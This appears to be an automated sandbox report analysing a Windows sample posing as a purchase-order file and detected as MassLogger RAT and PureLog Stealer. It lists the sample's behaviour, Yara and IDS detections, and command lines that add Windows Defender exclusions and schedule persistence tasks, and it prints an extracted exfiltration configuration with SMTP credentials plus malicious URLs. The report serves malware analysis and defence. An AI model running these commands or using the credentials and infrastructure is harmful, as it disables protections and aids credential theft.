Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_2024_056209_MQ04865_ENQ_1045.exe

Overview

General Information

Sample name:PO_2024_056209_MQ04865_ENQ_1045.exe
Analysis ID:1582674
MD5:c12317b003ebc503c85bab87c2104120
SHA1:71c988096ffbe3e4b6d9976fee29427c9bdbf23f
SHA256:5454862ee4069df3d2058763ab8d8e01abb4114e628f32305817f31f0ad1fe83
Tags:exeuser-julianmckein
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops executable to a common third party application directory
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO_2024_056209_MQ04865_ENQ_1045.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe" MD5: C12317B003EBC503C85BAB87C2104120)
    • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8020 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO_2024_056209_MQ04865_ENQ_1045.exe (PID: 8160 cmdline: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe" MD5: C12317B003EBC503C85BAB87C2104120)
      • Trading_AIBot.exe (PID: 3448 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 6036 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7472 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • apihost.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: B4B82042C00E471AC2399BADB63F1C10)
      • Microsofts.exe (PID: 2124 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • armsvc.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 72BA8A03C7C6EFEED1AD022BBE6E4CAE)
  • zeXKjViL.exe (PID: 7272 cmdline: C:\Users\user\AppData\Roaming\zeXKjViL.exe MD5: C12317B003EBC503C85BAB87C2104120)
    • schtasks.exe (PID: 7984 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zeXKjViL.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Roaming\zeXKjViL.exe" MD5: C12317B003EBC503C85BAB87C2104120)
    • zeXKjViL.exe (PID: 7204 cmdline: "C:\Users\user\AppData\Roaming\zeXKjViL.exe" MD5: C12317B003EBC503C85BAB87C2104120)
  • alg.exe (PID: 7304 cmdline: C:\Windows\System32\alg.exe MD5: 73A5E8C4C9FBA1AD14C07468F41BFB78)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7460 cmdline: C:\Windows\system32\AppVClient.exe MD5: 1B7D1BBDA98AC1FED8DBC0B99926E47C)
  • FXSSVC.exe (PID: 4628 cmdline: C:\Windows\system32\fxssvc.exe MD5: AC7FF2F8D7B75603AD58755D5762D640)
  • elevation_service.exe (PID: 7828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: A24F8FAC0C18922003D041CBD7188CCD)
  • maintenanceservice.exe (PID: 8112 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: AF4EAE172A1ED3A96A4B508B5229B3B2)
  • cleanup
{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\Microsofts.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x101cd:$a1: get_encryptedPassword
        • 0x10509:$a2: get_encryptedUsername
        • 0xff5a:$a3: get_timePasswordChanged
        • 0x1007b:$a4: get_passwordField
        • 0x101e3:$a5: set_encryptedPassword
        • 0x11bb3:$a7: get_logins
        • 0x11864:$a8: GetOutlookPasswords
        • 0x11642:$a9: StartKeylogger
        • 0x11b03:$a10: KeyLoggerEventArgs
        • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\Microsofts.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          SourceRuleDescriptionAuthorStrings
          00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xffcd:$a1: get_encryptedPassword
                • 0x10309:$a2: get_encryptedUsername
                • 0xfd5a:$a3: get_timePasswordChanged
                • 0xfe7b:$a4: get_passwordField
                • 0xffe3:$a5: set_encryptedPassword
                • 0x119b3:$a7: get_logins
                • 0x11664:$a8: GetOutlookPasswords
                • 0x11442:$a9: StartKeylogger
                • 0x11903:$a10: KeyLoggerEventArgs
                • 0x1149f:$a11: KeyLoggerEventArgsEventHandler
                00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 19 entries
                  SourceRuleDescriptionAuthorStrings
                  8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                      • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                      • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                      • 0x1fdd0:$s5: delete[]
                      • 0x1f288:$s6: constructor or from DllMain.
                      8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                        8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          Click to see the 55 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ProcessId: 7900, ProcessName: powershell.exe
                          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ProcessId: 7900, ProcessName: powershell.exe
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 3448, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3448, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7472, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", ProcessId: 8020, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ProcessId: 7900, ProcessName: powershell.exe

                          Persistence and Installation Behavior

                          barindex
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", ProcessId: 8020, ProcessName: schtasks.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-31T09:05:14.023229+010020516491A Network Trojan was detected192.168.2.4633971.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-31T09:05:11.347551+010020516481A Network Trojan was detected192.168.2.4574181.1.1.153UDP
                          2024-12-31T09:05:29.912750+010020516481A Network Trojan was detected192.168.2.4511791.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-31T09:05:07.955302+010020181411A Network Trojan was detected54.244.188.17780192.168.2.449739TCP
                          2024-12-31T09:05:09.556816+010020181411A Network Trojan was detected18.141.10.10780192.168.2.449742TCP
                          2024-12-31T09:05:11.324424+010020181411A Network Trojan was detected44.221.84.10580192.168.2.449745TCP
                          2024-12-31T09:06:04.494974+010020181411A Network Trojan was detected47.129.31.21280192.168.2.449789TCP
                          2024-12-31T09:06:06.454454+010020181411A Network Trojan was detected13.251.16.15080192.168.2.449800TCP
                          2024-12-31T09:06:11.794660+010020181411A Network Trojan was detected34.246.200.16080192.168.2.449841TCP
                          2024-12-31T09:06:12.339406+010020181411A Network Trojan was detected34.227.7.13880192.168.2.449847TCP
                          2024-12-31T09:06:17.574514+010020181411A Network Trojan was detected35.164.78.20080192.168.2.449883TCP
                          2024-12-31T09:06:18.396184+010020181411A Network Trojan was detected3.94.10.3480192.168.2.449891TCP
                          2024-12-31T09:06:24.548434+010020181411A Network Trojan was detected18.246.231.12080192.168.2.449927TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-31T09:05:07.955302+010020377711A Network Trojan was detected54.244.188.17780192.168.2.449739TCP
                          2024-12-31T09:05:09.556816+010020377711A Network Trojan was detected18.141.10.10780192.168.2.449742TCP
                          2024-12-31T09:05:11.324424+010020377711A Network Trojan was detected44.221.84.10580192.168.2.449745TCP
                          2024-12-31T09:06:04.494974+010020377711A Network Trojan was detected47.129.31.21280192.168.2.449789TCP
                          2024-12-31T09:06:06.454454+010020377711A Network Trojan was detected13.251.16.15080192.168.2.449800TCP
                          2024-12-31T09:06:11.794660+010020377711A Network Trojan was detected34.246.200.16080192.168.2.449841TCP
                          2024-12-31T09:06:12.339406+010020377711A Network Trojan was detected34.227.7.13880192.168.2.449847TCP
                          2024-12-31T09:06:17.574514+010020377711A Network Trojan was detected35.164.78.20080192.168.2.449883TCP
                          2024-12-31T09:06:18.396184+010020377711A Network Trojan was detected3.94.10.3480192.168.2.449891TCP
                          2024-12-31T09:06:24.548434+010020377711A Network Trojan was detected18.246.231.12080192.168.2.449927TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-31T09:05:20.949994+010028032742Potentially Bad Traffic192.168.2.449741132.226.8.16980TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-31T09:05:30.561464+010028508511Malware Command and Control Activity Detected192.168.2.44975772.52.178.2380TCP
                          2024-12-31T09:06:53.680062+010028508511Malware Command and Control Activity Detected192.168.2.44993854.244.188.17780TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-Avira URL Cloud: Label: malware
                          Source: http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153Avira URL Cloud: Label: malware
                          Source: http://ww7.fwiwk.biz/m?usid=27&utid=10221880067Avira URL Cloud: Label: phishing
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeReversingLabs: Detection: 42%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
